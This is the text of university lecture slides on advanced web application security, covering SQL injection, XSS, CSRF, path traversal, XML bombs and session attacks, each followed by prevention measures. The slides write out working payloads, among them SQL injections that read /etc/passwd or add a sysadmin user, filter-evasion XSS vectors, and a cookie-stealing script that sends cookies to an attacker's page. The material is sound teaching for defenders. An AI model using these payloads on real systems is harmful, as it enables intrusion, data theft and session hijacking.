Advanced Security for Systems Engineering VO 01: Web Application Security Stefan Taber, Christian Schanes INSO Industrial Software Institute of Computer Aided Automation Faculty of Informatics TU Wien
Agenda OWASP Top 10 SQL Injection XPath Injection Cross Site Scripting Cross Site Request Forgery Path Traversal Attack File Upload Attack Session Management 2 / 52
Introduction Security for Systems Engineering gives basics about SQL Injection, XSS and CSRF In this lecture we show examples of several advanced attacks on web applications including the consequences of attacks presenting how different attacks can work together to break applications 3 / 52
Web Applications World Wide in Use Browser Apps Applications Presentations 4 / 52
OWASP Top 10 2013 1. Injection 2. Broken Authentication and Session Management 3. Cross Site Scripting (XSS) 4. Insecure Direct Object References 5. Security Misconfiguration 6. Sensitive Data Exposure 7. Missing Function Level Access Control 8. Cross Site Request Forgery (CSRF) 9. Using Components with Known Vulnerabilities 10. Unvalidated Redirects and Forwards (See http://www.owasp.org/) 5 / 52
SQL Injection SQL Injection Insert SQL query data via the input data to the application and let the DMS interpret the malicious input. Blind SQL Injection The attacker has no direct feedback about the data but information about whether data is processed or not (side channel). Therefore, SQL Injection is possible but more effort is required to extract data from the target. 6 / 52
SQL Injection Identify Vulnerable Parameters (i) There are 3 main data types: number, string and date Identify vulnerable parameters of the type number Request: /myecommercesite/proddetails. asp?prodid=4 Testing: (1) SELECT FROM Products WHERE ProdID = 4 //ERROR (2) SELECT FROM Products WHERE ProdID = 3 + 1 //OK The parameter is vulnerable because of (2)! 7 / 52
SQL Injection Identify Vulnerable Parameters (ii) Identify vulnerable strings Request: /myecommercesite/proddetails. asp?prodname=book Testing: 1. SELECT * FROM Products WHERE ProdName= Book //ERROR 2. SELECT * FROM Products WHERE ProdName= B + ook //OK If (2) works, the parameter is vulnerable! 8 / 52
Differences in Databases Database identification by database behavior Attacks depend on specific functions MS SQL MySQL Access Oracle DB2 Postgres Cat Strings + concat (" ", " ") " "&" " " "+" " Null Isnull() Ifnull() Iff(Isnull()) Ifnull() Ifnull() COALESCE() Position CHARINDEX LOCATE() InStr() InStr() InStr() TEXTPOS() OS xp_cmdshell select into #date# utf_file import/export Call Cast Yes No No No Yes Yes (See http://www.owasp.org/) 9 / 52
Databases and Operating Systems Interaction with the file system Write files Read files Execute commands with the permissions of the database user 10 / 52
Blind SQL Injection Read Data The attacker has no feedback about the data but information about whether data is selected or not. Therefore, SQL Injection is possible but more effort is required to extract data from the target. A way to steal the data are Brute Force attacks. Output is only true or false 1. Example: customer exists/does not exist 2. admin and password like a% False 3. admin and password like b% True 4. admin and password like ba% False 5. admin and password like bk% True Automated Tools available, e.g., SqlDumper 11 / 52
UNION SELECT Injection UNION SELECT statements are used to combine multiple SQL statements to one single query Therefore, allows attacker to access all tables in a system All SELECT queries must have the same number of columns and the columns must have the same type 12 / 52
UNION SELECT Injection Example SELECT CCNum,CCType,CCExp,CCName FROM CreditCards WHERE AccNum=11223344 ORDER BY $order Inject order parameter: SELECT CCNum, CCType, CCExp, CCName FROM CreditCards WHERE AccNum=11223344 ORDER BY 1 UNION SELECT CCNum,NULL,NULL,NULL FROM CreditCards 13 / 52
Extended Stored Procedures MS-SQL MS-SQL Servers support a large number of extended stored procedures Implemented in DLLs Examples:... xp_cmdshell Execute commands on OS level xp_servicecontrol Start/stop services Example: Stopping the schedule service EXEC master..xp_servicecontrol stop, schedule Example: Execute ping ; exec master..xp_cmdshell ping ip-address -- 14 / 52
Fileaccess MySQL Load local files into the database LOAD FILE UNION SELECT,,load_file( /etc/passwd ); Write files with data from the database SELECT INTO OUTFILE Attackers can write the files to folders where they have access Example: Using the Web Server to get the written file SELECT * FROM user INTO OUTFILE /webserver/database-dump 15 / 52
SQL Injection Add database user MS-SQL exec sp_addlogin evil, passwd exec sp_addsrvrolemember evil, sysadmin MySQL INSERT INTO mysql.user (user, host, password) VALUES ( evil, localhost, PASSWORD( passwd )) Oracle CREATE USER evil IDENTIFIED BY passwd TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; GRANT CONNECT TO evil; GRANT RESOURCE TO evil; 16 / 52
SQL Injection Avoiding Input Filters (i) Examples for tautologies OR 1=1 OR now()=now() OR 2 BETWEEN 1 AND 3 Using functions and encodings union select * from users where login = char(114,111,111,116); 17 / 52
SQL Injection Avoiding Input Filters (ii) Using blanks, tabs and line breaks UNION SELECT UNION SELECT Using comments /**/OR/**/ x = x select/**/*/**/from/**/users; It is difficult to create correct filters, especially own filters 18 / 52
SQL Injection Prevention and Mitigation Input validation Stored procedure and prepared statements Principle of least privilege Random delays on successful and failing statement execution 19 / 52
XPath Injection Similar to SQL Injection. Instead of SQL, XPath statements are used Often possible when XML is used as database //user[name= admin and pass= secure ] Inject: or = //user[name= admin and pass= unknown or = ] 20 / 52
Cross Site Scripting (XSS) Interpretation of maliciously injected code in the browser Basically the user is the target, not the application Application is be abused as medium The malicious script code is loaded from a trustfully site Starting point to execute arbitrary code controlled by the attacker on the client side 21 / 52
Cross Site Scripting Identify Vulnerable Parameters Basic test for injectable fields of a web page URL parameter Any field in the page Headers of a HTTP message Test vectors Plain HTML: <h1>, <b>, <br/>, <img src=... > JavaScript: <script>...</script>, <img src= javascript:..., <b onmouseover=... > 22 / 52
Cross Site Scripting Examples Redirects <script>window. location. replace ( http :// stackoverflow.com );</script> Session Hijacking http ://www. testdomain.com/default. aspx?username =<script>window. location. href= http ://www. attackerpage.com/index.php?content= +document. cookie</script> 23 / 52
Cross Site Scripting Avoiding Input Filters <IMG SRC= javascript : alert ( XSS ); > <IMG SRC=javascript : alert ( XSS )> <IMG SRC=JaVaScRiPt: alert ( XSS )> <IMG SRC=javasc ript:ale rt('XSS')> ><STYLE>@import javascript : alert ( XSS ) ;</STYLE> >%22%27><img%20src%3d%22javascript : alert(%27%20xss%27)%22> %uff1cscript%uff1ealert ( XSS )%uff1c/script%uff1e ;! <XSS>=&{()} (See http://www.owasp.org/) 24 / 52
MySpace Worm (Samy Worm) as Example Adds profile Samy to users Within one day more than 1.000.000 contact requests JavaScript in CSS <div style="background:url( javascript:alert(1) )"> Avoid filtering of javascript via java\nscript Avoid filtering of " via String.fromCharCode(34) Avoid filtering of innerhtml via eval( document.body.inne + rhtml ) Using XML-HTTP (AJAX) for attacking the target (See http://namb.la/popular/tech.html) 25 / 52
Cross Site Scripting Prevention Input validation Filter or disable JavaScript and Flash in browser Content Security Policy 26 / 52
Cross Site Request Forgery (CSRF) CSRF: Abusing the trust of an application in the user Attacker sends a compromised HTTP request to the victim via the user 27 / 52
CSRF Identify Vulnerable Parameters (i) Identify unvalidated redirects and forwards Identify Insecure Direct Object References Identify SQL Injection vulnerable parameters Identify XSS vulnerable parameters Img-Tag Injection 28 / 52
CSRF Identify Vulnerable Parameters (ii) let u be the URL being tested; for example, u = http://www.example.com/action build a html page containing the HTTP request referencing URL u (specifying all relevant parameters; in the case of HTTP GET this is straightforward, while for a POST request you need to resort to some Javascript); make sure that the valid user is logged on the application; induce him into following the link pointing to the URL to be tested (social engineering involved if you cannot impersonate the user yourself); observe the result, i.e. check if the web server executed the request. (See https://www.owasp.org/index.php/testing_for_csrf_ (OTG-SESS-005)) 29 / 52
CSRF with Routers/Firewalls 1. Attacker creates a manipulated web page 2. User opens the manipulated web page 3. The response of the server is returned 4. Browser directly executes the commands in the response (without user interaction) 5. Attacker has access to the internal system and can modify the system, e.g., modify the firewall configuration 30 / 52
Examples of CSRF Attacks Multiple CSRF attacks in DD-WRT (Remote Root Command Execution) Cisco Router HTTP Administration CSRF Remote Command Execution OpenCA Cross Site Request Forgery (CVE-2008-0556) 31 / 52
CSRF Prevention Input validation Secret information with every request (e.g., token) Encrypted end-to-end connection Good Random Number Generator <form> <input type= hidden name= token value= 123 > New password : <input type= password name= new pwd > <input type= submit value= Submit > <a href= /users/userdetails?id=5&token=123 >Cancel</a> </form> 32 / 52
Path Traversal Attack Web directories are virtual directories based on the Operating System Specific failures (Perl scripts, Unicode,...) allow to break out from the directory structure provided by the web server Allows unauthorized access to files and programs on OS level Attackers are using this to navigate through directories and to collect information 33 / 52
Path Traversal Identify Vulnerable Parameters Basic test for fields of a web page URL parameter URL path Headers of a HTTP message Test vectors../../../../etc/passwd../../boot.ini..\..\boot.ini 34 / 52
Example of Path-Traversal / Command Injection Path-Traversal using Unicode http://www.victim.com/scripts/..%c0%af../windows/ system32/cmd.exe?/c+dir Decoding the Unicode characters results in: http://www.victim.com/scripts/../../windows/ system32/cmd.exe?/c+dir 35 / 52
Path Traversal Prevention Configuration hardening Input validation Principle of least privilege 36 / 52
File Upload Attack Using file upload fields to upload malicious files Possible attacks DoS Command Injection 37 / 52
File Upload Attack Identify Vulnerable Parameters Null-Byte-File Large files Wrong filetype XSS by filename 38 / 52
File Upload Attack XML Bomb Create a high processing load with minimal data Allows Denial of Service attacks <?xml version= 1.0?> <!DOCTYPE foobar [ <!ENTITY x0 ESSE > <!ENTITY x1 &x0;&x0; > <!ENTITY x2 &x1;&x1; >... <!ENTITY x98 &x97;&x97; > <!ENTITY x99 &x98;&x98; > ]> <foobar>&x99;</foobar> 39 / 52
File Upload Attack Prevention Limit for file size Break upload when file size is over limit Input validation Principle of least privilege Configuration hardening Validate filetype by magic number (like the UNIX command file ) 40 / 52
HTTP Session Management HTTP is stateless Session Management required using cookies, hidden form fields, URL parameter Client-side sessions vs. server-side sessions Cookies: session data is part of the HTTP header (e.g., non-persistent cookies) URL parameter: pass session data via URL (e.g., "parameter=value", multiple values separated by &) Hidden form fields: hidden HTML code, detectable by source code analysis (e.g., <input type="hidden" name="name" value="value">) 41 / 52
Session ID Sessions store information about the actual state User login User remains logged in Sessions implemented by session IDs Takeover of existing sessions possible Bad quality of session IDs Random session IDs vs. built session IDs (username, date,...) Cookies vs. encoded into the url as parameter Session IDs in referrer available for other pages 42 / 52
Identify Vulnerabe Session IDs Entropy of Sessions IDs Does a user get a new session ID after a successful login? Is the session destroyed after logout? 43 / 52
Session Fixation Attack (i) 44 / 52
Session Fixation Attack (ii) 1. Attacker sends request to the web server 2. Web server generates a new session and transfers the session ID 3. Attacker sends a link with the session ID to the victim 4. Victim opens the link 5. Victim logs into the web service using the supplied session ID Attacker has now a valid session with the identity of the victim 45 / 52
Pseudo Random Number Generator (PRNG) Many security methods depend on the unpredictability of random numbers Cryptographic keys Session IDs Authentication Protocols / Handshake Security of PRNG depends on: Confidentiality and randomness of the seed Quality of the algorithm 46 / 52
Session IDs Protection Techniques Secure Random Number Generator Existing libraries for session management New session ID after login Timelimit for sessions Use security flags in session ID cookies HttpOnly: the cookie cannot be accessed through client side script Secure: send only over HTTPS Expire: expire date Encrypted connection (HTTPS) 47 / 52
Combinations of Attacks Download source code using Path Traversal Source analysis finds a weak PRNG Predictable CSRF tokens Launch CSRF attacks 48 / 52
Input Filter Input validation Blacklist filter Whitelist filter Sanitization Backlist filters based on signatures are complex, because there are so many ways to express the same. 49 / 52
Summary Web application security required OWASP Top 10 vulnerabilities Advanced attack techniques to break web applications (SQL Injection, XSS, CSRF, XML Attacks) Prevention and Mitigation of such attacks 50 / 52
Literature/Links Michal Zalewski. The Tangled Web: A Guide to Securing Modern Web Applications. No Starch Press, San Francisco, CA, USA, 1 edition, 2011. ISBN 1593273886, 9781593273880 Open Web Application Security Project www.owasp.org OWASP Top 10 Project OWASP Testing Guide Web Application Security Consortium www.webappsec.org RFC 2616 (HTTP 1.1) 51 / 52
Thank you! http://security.inso.tuwien.ac.at/ INSO Industrial Software Institute of Computer Aided Automation Faculty of Informatics TU Wien